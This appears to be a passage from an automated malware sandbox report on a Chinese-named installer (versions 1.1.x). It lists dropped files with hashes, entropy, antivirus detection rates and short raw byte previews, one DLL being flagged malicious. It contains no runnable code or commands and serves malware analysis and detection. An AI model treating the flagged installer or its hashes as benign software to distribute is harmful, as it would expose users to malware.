                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711187
                          Encrypted:true
                          SSDEEP:98304:Rkmv9U+uJKdOgdj5p+L2rV0kO8FvA3lUMMC+6U+:NW+uAdOEosV7XvA3aw+6U+
                          MD5:AC6EE02365E4BD73722DCF5FF60465B4
                          SHA1:43B62568AC3C8047B2FFA2FE478CCE8227C8E56E
                          SHA-256:E9F4C3E50CA85DEE7A9DD5E32846B7AA896647307E47515D361E1FB09EEB7DDF
                          SHA-512:1E68D326196B2A49A8CBB4F467981F4197138FAA9BC39DC0BDE6130702861C10520FBDA8AC70B070E6052D67B22D1D0FA7F64F08CEC252DE13CB521A5471B48B
                          Malicious:false
                          Preview:.@S......Y]<\...............L6.w6.....U...9.F.k.......g.....Y:.....s_U.P.jS2.]..G...}..'.w...J .3T..U`.u.Y......>n..Z..2...hw......@...#R.lL..Gb..C..\....}...S.8......t.9H..JU-?.U)......S.~...&.p..7.3J..7.&J..J.O........>|.)V.i..p.R..,x.N....#...X..8..f........`.?.xO.S......<.V..........u..^.$...I..;..`.l...;s..F.e..=.O..q.:;{..Q......%...8=j..Sr}.#WY.)....K+....|.*..;.B...d..:.l.L.....n...YE.&....0.Z,.0.r.s8.ig........QO..G............`..&..".G0M..}mk.Q..@.......0<)..|.t.e+5..........."!..d....p..u.2d.G....".....,.e.`...K......0..#..`(.d... v..<....y..J.}.......YM...E....{..%A.....BJ..D.Z.cN..?......,.TD7o......D=\+.L.i.k..D.-.......E9@.o.K..p.w...A}i.h5..Y.....E*....cJ..cm.1o.....8.....:.d1...%hG..DN$..nh..#..T.Hg.5.....M..?.8.......KS4B.j..@!%..(.....3..EW.[=u..........%..t....j!%..%d...s][.Ses.0....a.r...m.}...b.q.O`:<.......Y.8....v...}.G..I...p .z.u.......7.9.`"^};....q./A.^.2B^..P...rJ..KG..o..&...lI?}H..F.%1......O......V.e...b..8.x...
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          • Antivirus: Virustotal, Detection: 38%, Browse
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711187
                          Encrypted:true
                          SSDEEP:98304:Rkmv9U+uJKdOgdj5p+L2rV0kO8FvA3lUMMC+6U+:NW+uAdOEosV7XvA3aw+6U+
                          MD5:AC6EE02365E4BD73722DCF5FF60465B4
                          SHA1:43B62568AC3C8047B2FFA2FE478CCE8227C8E56E
                          SHA-256:E9F4C3E50CA85DEE7A9DD5E32846B7AA896647307E47515D361E1FB09EEB7DDF
                          SHA-512:1E68D326196B2A49A8CBB4F467981F4197138FAA9BC39DC0BDE6130702861C10520FBDA8AC70B070E6052D67B22D1D0FA7F64F08CEC252DE13CB521A5471B48B
                          Malicious:false
                          Preview:.@S......Y]<\...............L6.w6.....U...9.F.k.......g.....Y:.....s_U.P.jS2.]..G...}..'.w...J .3T..U`.u.Y......>n..Z..2...hw......@...#R.lL..Gb..C..\....}...S.8......t.9H..JU-?.U)......S.~...&.p..7.3J..7.&J..J.O........>|.)V.i..p.R..,x.N....#...X..8..f........`.?.xO.S......<.V..........u..^.$...I..;..`.l...;s..F.e..=.O..q.:;{..Q......%...8=j..Sr}.#WY.)....K+....|.*..;.B...d..:.l.L.....n...YE.&....0.Z,.0.r.s8.ig........QO..G............`..&..".G0M..}mk.Q..@.......0<)..|.t.e+5..........."!..d....p..u.2d.G....".....,.e.`...K......0..#..`(.d... v..<....y..J.}.......YM...E....{..%A.....BJ..D.Z.cN..?......,.TD7o......D=\+.L.i.k..D.-.......E9@.o.K..p.w...A}i.h5..Y.....E*....cJ..cm.1o.....8.....:.d1...%hG..DN$..nh..#..T.Hg.5.....M..?.8.......KS4B.j..@!%..(.....3..EW.[=u..........%..t....j!%..%d...s][.Ses.0....a.r...m.}...b.q.O`:<.......Y.8....v...}.G..I...p .z.u.......7.9.`"^};....q./A.^.2B^..P...rJ..KG..o..&...lI?}H..F.%1......O......V.e...b..8.x...
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.9966757919724305
                          Encrypted:true
                          SSDEEP:1536:tbPNdvKr+P8q3sS98KMig531vQ3/Wk+7Muede2XmUTme:FPN9cculQS71Yv3
                          MD5:F065238DE3B0B5224E6E3B7E32C26453
                          SHA1:088F982BC7F543FDBB97F71B2FD290361DBCA699
                          SHA-256:435534E13F7370594B41DC6975CD8C0301676006C02362546E9CA3A3EFC4C156
                          SHA-512:6F54DC7A0DF90E3E735691E55259668C207AD3D6AF151EC34100A6331A197851FD9014118E2BDC9C5FFD65D071A5EB4BFFB38CABB071004DB1BDF9D62F393096
                          Malicious:false
                          Preview:.@S.....xl ................j....PE.F".T(.=(..Z..aK^..&....@H.E.!..Ge...mD....S........bQ.}.....7.6....Z..M..e7....5..w..8?....pfF.:.."...#(.p.........r).....f.D..X......M....H..?..*..Gs...Z..Y..Q.,...;*p...6.|......L...rm....vk...||......,....j...N.7.5~...t.+.#o...[.C.^.qX.i\.....q..n..^o.FH.Q...v..&...{Y.D..U....L.h......../~..iem.o..1.MWC.m.{.. .K..~mb......P.i....2..3.$b.rt......N~].....;.Phn. ...@...W..AE......H.P...D ;c.].....2.b.....(.....K.r.}_...'D..^.Q..`}.e6..m..k.d$..N.....E...xO.!..EU..C?Q...8M.2..PcI.).......j...&....l.zsh...;./[..H.K0..e.....K........f..C../E..Z.....t].u!...d.).b.....Z..;A..........i....,..m..........dDl....};........6 8...............~.%i....m!1......:gK...U.y....r.]...<..^{.fR..30.C..g=YZ....Z.{|i....I.x...^*..\.C.fX.t..e..#..}.k.P...K|rtg.fuk.(.f...p..1.k.F....P..'...|4..7Q...5.Q...+...4..y...z.<..)..]`..M..>.B,.9n..cY.h....t..W......z>].'.....Xw..-.....a-A?..c.%..m.....p_9..P..J.j...A...:........
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.99667579197243
                          Encrypted:true
                          SSDEEP:1536:TJL/LBUdYW62Y31rDdLF0PWz1atMxdH2/BClsdhKS9vk:Tleds2Y3BDdLuuGM/KBClsdhKovk
                          MD5:1F120CDB26EC4B1FB0237C089D66ACE7
                          SHA1:9CC3427B1EBC127DDF3FDF9A47CA9D6FCDB789FD
                          SHA-256:0E7DF22F81684783E851C2EFA8BE04343142A400E9EDD8FF7C934760159A376B
                          SHA-512:9CAA9544FD686C14270A8826C799E5D9481E2C43B46A2A2BACE70EC8B3D89E512CBBF5DDA6EA4768F798D9A027252AD03D7F41C36E966AD14A7A5CC5092956FC
                          Malicious:false
                          Preview:7z..'....T|.........2..........<"9N...0..6..i...N.*I.......M.d...?.4..n...Ef~b..fM......B.&..-..{.j...2.6.X1.%.T..!T....P'.#MV.a5.....z...e....y!......(<|..0/>....WrS.,j.@n.G..$.z..0~...Q...R./5..}La....).&.0....uES....i,"......g....U...kfk....3......C..{/a.....a...W.A...w.q..%....\E<1.la.\.Y.BX.....R...8.J..\&'_..d.C[.2z4 ...X.[..s.Uo*.M......V..s....N......ET...S&.O`=.E.N`/..QV.t...).h.....d@p^..`...H..............P&F.>..L.iL....q..m.6......5'A<..{..!.....vJ#n.33.........).....Nx......>.F2.F&-[..y.E...#&..0.x...|......0lJ...{...G+.[V.xX......Ek.....(.N..WC...H...&..({.b..ag.D..t!.Kt..p.?...X~1F.*...LDZ 5\..%..=b{RV}.+h.V1./....C..7....+"...qT/D....hE._s.p...sq%HS.....+i4.X..v....$pj....U..6.[......G....S.5..Ma.2......gR..!.?.....F.{k.f...[8MW.C...E...}.&.3.....c.}F.}9...o.Ue........H.&.!yO0.N?.....%.3..%..........@...H.@.*..@..O..E...D.mG..1Q..1.....9r..j.......rLT.h}..:g1_.Ly..4b.d...8....v.u./3.v...DH.=....|]"nP...I=.70..ZZ....t..Kq}...l
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711188
                          Encrypted:true
                          SSDEEP:98304:+XXOlk822gQUKZ2ecz7upfuutUiyfLOjrWZ:Uel0pKZ2ec/upfuwylZ
                          MD5:8CD35311B784040092611827E49F8BE3
                          SHA1:909D769731A81DAA04CA25A1F325206ADC22BA20
                          SHA-256:9CD7F9F2281FFF8F455A731FF75E3670C9A24028840202AF378FBE3C5089CA66
                          SHA-512:2CA2DE6081D67D852775C81620BC18A4D16849B4177A7F083CD372173BB37BE6C8316921FEFC1BFB81E0731FAE320586E503E2C9FF7C41155FED16ADECA45DA4
                          Malicious:false
                          Preview:7z..'...?,....1.....A.............+?..<y...m.).]..%......)".Cy...8BP9......k...,.. .N#..]....r.`...l.......s.<.w}H"....pn.ChU..q+......Ho.%...b...9.W\....w.c...Fp.J..>.........;..MX 4h..k...#.....D(.N....d.z..d.s..=.....Q....S.t.m=...=.(.jo)....$...C...$i7........j...R%.e..L.@!V!Vb.3..;......?..l.0....:7yj.t.......].Q..#..SN....e.88Y..J|...L..;...k.lM....k].~.9.iF.v.&.APW.G..0...!..Ix..U.l...hF...r.....o........\wl...p.(..|is.7..o.~.K.3.y.. v.h..!....3E9..Udf.@....8.~...r...<^{.n./Fk.nP....P..y..[.-.<..E\..*.....?.t.6t~R.C...~T.Q^..E....Be>.B..+%...a,.&.[.ff..$....'.iS=T.ke.g.x.8......M....+..Ib('.*.'g...2.N$.T....W..a..V.{.@p..'...o......].......t...&.X.J.K..lR%{b..W+.......f.`...L,.V....Yp^../....(...$k..V..z..7.~.r.7.i..(..H$.S1#...E.R5....S...iX3..9......Y.No...2<../,..+.S....&...).....,C.&/3`....,g...i.hN9..2....U1...<D...X.en.+.D...k@..[....Y.U.KWZJZ`%.........71..V.....e..*!-..b[..!..;...<!....c5.q..(jNzm/..2.W..$....=..9,.%j.lq4
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
